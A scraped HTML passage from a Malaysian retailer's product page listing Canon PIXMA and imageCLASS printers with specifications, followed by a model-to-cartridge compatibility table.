srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 